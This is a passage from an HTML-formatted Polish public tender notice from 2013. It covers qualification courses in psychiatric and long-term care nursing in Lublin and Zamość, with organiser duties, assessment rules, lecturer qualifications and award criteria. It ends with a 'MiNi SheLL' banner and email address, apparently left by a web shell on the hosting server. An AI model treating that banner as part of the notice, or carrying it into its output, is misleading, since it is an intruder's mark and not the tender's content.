Do zadań kierownika kursu oprócz zadań określonych w rozporządzeniu wydanym na podstawie art. 10u, ustawy z dnia 22 maja 2003r. o zmianie ustawy o zawodach pielęgniarki
i położnej oraz ustawy zmieniającej ustawę o zawodach pielęgniarki i położnej (Dz. U. Nr 109, poz.1029) powinno należeć:
a)	współdecydowanie o doborze kadry dydaktycznej,
b)	przedstawienie uczestnikom kursu: celu, programu i organizacji kursu,
c)	ocenianie placówek szkolenia praktycznego wg specyfiki i organizacji zajęć,
d)	pomaganie w rozwiązywaniu problemów,
e)	udzielanie indywidualnych konsultacji uczestnikom kursu,
f)	zbieranie i analizowanie opinii o przebiegu kursu,
g)	zaliczanie kursu i dokonanie wpisu w karcie kursu kwalifikacyjnego.
W dniu rozpoczęcia kursu każdy uczestnik powinien otrzymać:
a)	harmonogram zajęć teoretycznych i praktycznych,
b)	wykaz umiejętności będących przedmiotem kształcenia,
c)	kartę kursu kwalifikacyjnego, która z wymaganymi wpisami i zaliczeniami, stanowi dowód ich odbycia.
4.	Powołać komisję kwalifikacyjną.
5.	Powołać w uzgodnieniu z kierownikiem kursu opiekunów szkolenia praktycznego, którzy powinni być merytorycznymi pracownikami placówek, w których odbywa się szkolenie praktyczne.
Do zadań opiekuna szkolenia praktycznego należy:
a)	instruktaż wstępny (zapoznanie z celem szkolenia praktycznego, z organizacją pracy, wyposażeniem placówki, jego personelem, zakresem udzielanych świadczeń i in.),
b)	instruktaż bieżący (organizacja i prowadzenie zajęć, kontrola nad ich prawidłowym
przebiegiem, pomoc w rozwiązywaniu problemów i in.),
c)	instruktaż końcowy (omówienie i podsumowanie zajęć, zaliczenie świadczeń
zdrowotnych określonych w programie kształcenia, ocena uzyskanych wiadomości
i umiejętności).
6.	Wskazać kadrę dydaktyczną posiadającą kwalifikacje określone w programie ramowym.
7.	Zapewnić bazę dydaktyczną dostosowaną do liczby uczestników kursu kwalifikacyjnego:
a)	sale wykładowe,
b)	sale warsztatowe,
c)	pomieszczenia wyposażone w specjalistyczny sprzęt i aparaturę,
d)	pracownie informatyczne.
8.	Zaprojektować, w odniesieniu do poszczególnych modułów, środki dydaktyczne oraz formy zajęć, ze szczególnym uwzględnieniem form aktywizujących.
9.	Zaprojektować literaturę do poszczególnych modułów uwzględniając kryterium aktualności i adekwatności doboru do treści nauczania.
10.	Dobrać placówki stażowe zgodnie z planem nauczania, w których możliwe będzie zdobywanie umiejętności niezbędnych do wykonywania określonych świadczeń zdrowotnych.
11.	Posiadać wewnętrzny system monitorowania jakości kształcenia.

Sposób sprawdzania efektów nauczania
W toku realizacji programu kształcenia należy prowadzić ocenianie: 
1.	Bieżące - rozumiane jako zaliczanie poszczególnych modułów (sprawdzenie stopnia opanowania wiedzy i umiejętności będących przedmiotem nauczania teoretycznego
i praktycznego, w tym świadczeń zdrowotnych przewidzianych w programie kształcenia). Warunki zaliczania ustala wykładowca/opiekun szkolenia praktycznego w porozumieniu
z kierownikiem kursu kwalifikacyjnego.
2.	Końcowe - egzamin teoretyczny lub praktyczny przeprowadzony przez komisję egzaminacyjną powołaną przez organizatora kształcenia podyplomowego.

	KWALIFIKACJE KADRY DYDAKTYCZNEJ
	Organizator kształcenia zapewnia w przedmiotowej dziedzinie kształcenia wykładowców posiadających:
tytuł naukowy profesora,
stopień naukowy doktora habilitowanego,
stopień naukowy doktora, a ponadto wykładowcami mogą być osoby mające nie mniej niż pięcioletni staż zawodowy w dziedzinie będącej przedmiotem kształcenia, doświadczenie dydaktyczne oraz spełniają, co najmniej jeden z warunków:
posiadają tytuł zawodowy magistra pielęgniarstwa,
posiadają tytuł specjalisty w dziedzinie pielęgniarstwa psychiatrycznego, 
posiadają specjalizację lekarską w dziedzinie medycyny odpowiadającą dziedzinie pielęgniarstwa będącej przedmiotem kursu,
posiadają wykształcenie wyższe mające zastosowanie w ochronie zdrowia i/lub inne kwalifikacje niezbędne do realizacji wybranych zagadnień.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.56.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w prowadzeniu kursów kwalifikacyjnych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs kwalifikacyjny pielęgniarstwa opieki długoterminowej [Miejsce kształcenia Lublin].</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakładana liczba uczestników: 16 osób.
Okres kształcenia: styczeń - sierpień 2013 r.
Łączną liczba godzin: 490 godzin dydaktycznych, w tym:
- blok ogólnozawodowy - 135 godzin
- blok specjalistyczny - 355 godzin, w tym
- część teoretyczna - 180 godzin
- część praktyczna - 175 godzin
Plan nauczania określony został dla dziennego trybu kształcenia i zawiera liczbę godzin przeznaczoną na realizację poszczególnych modułów. Z uwagi jednak na lokalne preferencje i potrzeby, prowadzący zajęcia w porozumieniu z kierownikiem kursu mogą dokonać modyfikacji czasu kształcenia w wymiarze nie większym niż 20%. Oznacza to, że 80% czasu przeznaczonego na realizację poszczególnych modułów nie podlega zmianie. Wskazane 20% może być wykorzystane na przesunięcia pomiędzy poszczególnymi modułami lub w części może zostać przeznaczone na realizację zadań w ramach samokształcenia. Organizator, w porozumieniu z kierownikiem kursu oraz wykładowcami, ma prawo do modyfikacji czasu trwania kształcenia w zależności od programu realizowanego w trybie innym niż dzienny.

Sposób organizacji
Za przebieg i organizację kursu kwalifikacyjnego odpowiedzialny jest organizator kształcenia.
Planując realizację kursu organizator powinien:
1.	Opracować program kształcenia.
2.	Opracować regulamin organizacyjny kursu, który w szczególności określa:
a)	organizację kursu, 
b)	zasady i sposób naboru osób,
c)	prawa i obowiązki osób uczestniczących w kursie, 
d)	zakres obowiązków wykładowców i innych osób prowadzących nauczanie teoretyczne i szkolenie praktyczne,
e)	zasady przeprowadzenia egzaminu.
3.	Powołać kierownika kursu kwalifikacyjnego;
Do zadań kierownika kursu oprócz zadań określonych w rozporządzeniu wydanym na podstawie art. 10u, ustawy z dnia 22 maja 2003 r. o zmianie ustawy o zawodach pielęgniarki i położnej oraz ustawy zmieniającej ustawę o zawodach pielęgniarki i położnej (Dz. U. Nr 109, poz.1029) powinno należeć:
a)	współdecydowanie o doborze kadry dydaktycznej,
b)	przedstawienie uczestnikom kursu: celu, programu i organizacji kursu,
c)	ocenianie placówek szkolenia praktycznego wg specyfiki i organizacji zajęć,
d)	pomaganie w rozwiązywaniu problemów,
e)	udzielanie indywidualnych konsultacji uczestnikom kursu,
f)	zbieranie i analizowanie opinii o przebiegu kursu,
g)	zaliczanie kursu i dokonanie wpisu w karcie kursu kwalifikacyjnego.
W dniu rozpoczęcia kursu każdy uczestnik powinien otrzymać:
a)	harmonogram zajęć teoretycznych i praktycznych,
b)	wykaz umiejętności będących przedmiotem kształcenia,
c)	kartę kursu kwalifikacyjnego, która z wymaganymi wpisami i zaliczeniami, stanowi dowód ich odbycia.
4.	Powołać komisję kwalifikacyjną.
5.	Powołać w uzgodnieniu z kierownikiem kursu opiekunów szkolenia praktycznego, którzy powinni być merytorycznymi pracownikami placówek, w których odbywa się szkolenie praktyczne.
Do zadań opiekuna szkolenia praktycznego należy:
a)	instruktaż wstępny (zapoznanie z celem szkolenia praktycznego, z organizacją pracy, wyposażeniem placówki, jego personelem, zakresem udzielanych świadczeń i in.),
b)	instruktaż bieżący (organizacja i prowadzenie zajęć, kontrola nad ich prawidłowym przebiegiem, pomoc w rozwiązywaniu problemów i in.),
c)	instruktaż końcowy (omówienie i podsumowanie zajęć, zaliczenie świadczeń zdrowotnych określonych w programie kształcenia, ocena uzyskanych wiadomości
i umiejętności).
6.	Wskazać kadrę dydaktyczną posiadającą kwalifikacje określone w programie ramowym.
7.	Zapewnić bazę dydaktyczną dostosowaną do liczby uczestników kursu kwalifikacyjnego:
a)	sale wykładowe,
b)	sale warsztatowe,
c)	pomieszczenia wyposażone w specjalistyczny sprzęt i aparaturę,
d)	pracownie informatyczne.
8.	Przewidzieć, w odniesieniu do poszczególnych modułów, środki dydaktyczne oraz formy zajęć, ze szczególnym uwzględnieniem form aktywizujących.
9.	Uwzględnić literaturę do poszczególnych modułów uwzględniając kryterium aktualności
i adekwatności doboru do treści nauczania.
10.	Dobrać placówki stażowe zgodnie z planem nauczania, w których możliwe będzie zdobywanie umiejętności niezbędnych do wykonywania określonych świadczeń zdrowotnych.
11.	Posiadać wewnętrzny system monitorowania jakości kształcenia.

Sposób sprawdzania efektów nauczania
W toku realizacji programu kształcenia należy prowadzić ocenianie: 
1.	Bieżące - rozumiane jako zaliczanie poszczególnych modułów (sprawdzenie stopnia opanowania wiedzy i umiejętności będących przedmiotem nauczania teoretycznego
i praktycznego, w tym świadczeń zdrowotnych przewidzianych w programie kształcenia). Warunki zaliczania ustala wykładowca/opiekun szkolenia praktycznego w porozumieniu
z kierownikiem kursu kwalifikacyjnego.
2.	Końcowe - egzamin teoretyczny lub praktyczny przeprowadzony przez komisję egzaminacyjną powołaną przez organizatora kształcenia podyplomowego.

	KWALIFIKACJE KADRY DYDAKTYCZNEJ
	
	Organizator kształcenia zapewnia w przedmiotowej dziedzinie kształcenia wykładowców posiadających:
tytuł naukowy profesora,
stopień naukowy doktora habilitowanego,
stopień naukowy doktora, a ponadto wykładowcami mogą być osoby mające nie mniej niż pięcioletni staż zawodowy 
w dziedzinie będącej przedmiotem kształcenia, doświadczenie dydaktyczne oraz spełniają, co najmniej jeden z warunków:
posiadają tytuł zawodowy magistra pielęgniarstwa,
posiadają tytuł specjalisty w dziedzinie pielęgniarstwa przewlekle chorych 
i niepełnosprawnych lub w dziedzinie pokrewnej,
posiadają specjalizację lekarską w dziedzinie medycyny odpowiadającą dziedzinie pielęgniarstwa będącej przedmiotem kursu,
posiadają wykształcenie wyższe mające zastosowanie w ochronie zdrowia i/lub inne kwalifikacje niezbędne do realizacji wybranych zagadnień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.56.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w prowadzeniu kursów kwalifikacyjnych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs kwalifikacyjny pielęgniarstwa opieki długoterminowej [Miejsce kształcenia Zamość].</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakładana liczba uczestników: 18 osób.
Okres kształcenia: styczeń - sierpień 2013 r.
Łączną liczba godzin: 490 godzin dydaktycznych, w tym:
- blok ogólnozawodowy - 135 godzin
- blok specjalistyczny - 355 godzin, w tym
- część teoretyczna - 180 godzin	
- część praktyczna - 175 godzin
Plan nauczania określony został dla dziennego trybu kształcenia i zawiera liczbę godzin przeznaczoną na realizację poszczególnych modułów. Z uwagi jednak na lokalne preferencje i potrzeby, prowadzący zajęcia w porozumieniu z kierownikiem kursu mogą dokonać modyfikacji czasu kształcenia w wymiarze nie większym niż 20%. Oznacza to, że 80% czasu przeznaczonego na realizację poszczególnych modułów nie podlega zmianie. Wskazane 20% może być wykorzystane na przesunięcia pomiędzy poszczególnymi modułami lub w części może zostać przeznaczone na realizację zadań w ramach samokształcenia. Organizator, w porozumieniu z kierownikiem kursu oraz wykładowcami, ma prawo do modyfikacji czasu trwania kształcenia w zależności od programu realizowanego w trybie innym niż dzienny.
Sposób organizacji
Za przebieg i organizację kursu kwalifikacyjnego odpowiedzialny jest organizator kształcenia.
Planując realizację kursu organizator powinien:
1.	Opracować program kształcenia.
2.	Opracować regulamin organizacyjny kursu, który w szczególności określa:
a)	organizację kursu, 
b)	zasady i sposób naboru osób,
c)	prawa i obowiązki osób uczestniczących w kursie, 
d)	zakres obowiązków wykładowców i innych osób prowadzących nauczanie teoretyczne i szkolenie praktyczne,
e)	zasady przeprowadzenia egzaminu.
3.	Powołać kierownika kursu kwalifikacyjnego;
Do zadań kierownika kursu oprócz zadań określonych w rozporządzeniu wydanym na podstawie art. 10u, ustawy z dnia 22 maja 2003 r. o zmianie ustawy o zawodach pielęgniarki
i położnej oraz ustawy zmieniającej ustawę o zawodach pielęgniarki i położnej (Dz. U. Nr 109, poz.1029) powinno należeć:
a)	współdecydowanie o doborze kadry dydaktycznej,
b)	przedstawienie uczestnikom kursu: celu, programu i organizacji kursu,
c)	ocenianie placówek szkolenia praktycznego wg specyfiki i organizacji zajęć,
d)	pomaganie w rozwiązywaniu problemów,
e)	udzielanie indywidualnych konsultacji uczestnikom kursu,
f)	zbieranie i analizowanie opinii o przebiegu kursu,
g)	zaliczanie kursu i dokonanie wpisu w karcie kursu kwalifikacyjnego.
W dniu rozpoczęcia kursu każdy uczestnik powinien otrzymać:
a)	harmonogram zajęć teoretycznych i praktycznych,
b)	wykaz umiejętności będących przedmiotem kształcenia,
c)	kartę kursu kwalifikacyjnego, która z wymaganymi wpisami i zaliczeniami, stanowi dowód ich odbycia.
4.	Powołać komisję kwalifikacyjną.
5.	Powołać w uzgodnieniu z kierownikiem kursu opiekunów szkolenia praktycznego, którzy powinni być merytorycznymi pracownikami placówek, w których odbywa się szkolenie praktyczne.
Do zadań opiekuna szkolenia praktycznego należy:
a)	instruktaż wstępny (zapoznanie z celem szkolenia praktycznego, z organizacją pracy, wyposażeniem placówki, jego personelem, zakresem udzielanych świadczeń i in.),
b)	instruktaż bieżący (organizacja i prowadzenie zajęć, kontrola nad ich prawidłowym przebiegiem, pomoc w rozwiązywaniu problemów i in.),
c)	instruktaż końcowy (omówienie i podsumowanie zajęć, zaliczenie świadczeń zdrowotnych określonych w programie kształcenia, ocena uzyskanych wiadomości
i umiejętności).
6.	Wskazać kadrę dydaktyczną posiadającą kwalifikacje określone w programie ramowym.
7.	Zapewnić bazę dydaktyczną dostosowaną do liczby uczestników kursu kwalifikacyjnego:
a)	sale wykładowe,
b)	sale warsztatowe,
c)	pomieszczenia wyposażone w specjalistyczny sprzęt i aparaturę,
d)	pracownie informatyczne.
8.	Przewidzieć, w odniesieniu do poszczególnych modułów, środki dydaktyczne oraz formy zajęć, ze szczególnym uwzględnieniem form aktywizujących.
9.	Uwzględnić literaturę do poszczególnych modułów uwzględniając kryterium aktualności i adekwatności doboru do treści nauczania.
10.	Dobrać placówki stażowe zgodnie z planem nauczania, w których możliwe będzie zdobywanie umiejętności niezbędnych do wykonywania określonych świadczeń zdrowotnych.
11.	Posiadać wewnętrzny system monitorowania jakości kształcenia.

Sposób sprawdzania efektów nauczania
W toku realizacji programu kształcenia należy prowadzić ocenianie: 
1.	Bieżące - rozumiane jako zaliczanie poszczególnych modułów (sprawdzenie stopnia opanowania wiedzy i umiejętności będących przedmiotem nauczania teoretycznego i praktycznego, w tym świadczeń zdrowotnych przewidzianych w programie kształcenia). Warunki zaliczania ustala wykładowca/opiekun szkolenia praktycznego w porozumieniu z kierownikiem kursu kwalifikacyjnego.
2.	Końcowe - egzamin teoretyczny lub praktyczny przeprowadzony przez komisję egzaminacyjną powołaną przez organizatora kształcenia podyplomowego.

	KWALIFIKACJE KADRY DYDAKTYCZNEJ
	
	Organizator kształcenia zapewnia w przedmiotowej dziedzinie kształcenia wykładowców posiadających:
tytuł naukowy profesora,
stopień naukowy doktora habilitowanego,
stopień naukowy doktora,a ponadto wykładowcami mogą być osoby mające nie mniej niż pięcioletni staż zawodowy w dziedzinie będącej przedmiotem kształcenia, doświadczenie dydaktyczne oraz spełniają, co najmniej jeden z warunków:
posiadają tytuł zawodowy magistra pielęgniarstwa,
posiadają tytuł specjalisty w dziedzinie pielęgniarstwa przewlekle chorych 
i niepełnosprawnych lub w dziedzinie pokrewnej,
posiadają specjalizację lekarską w dziedzinie medycyny odpowiadającą dziedzinie pielęgniarstwa będącej przedmiotem kursu,
posiadają wykształcenie wyższe mające zastosowanie w ochronie zdrowia i/lub inne kwalifikacje niezbędne do realizacji wybranych zagadnień.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.56.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w prowadzeniu kursów kwalifikacyjnych - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com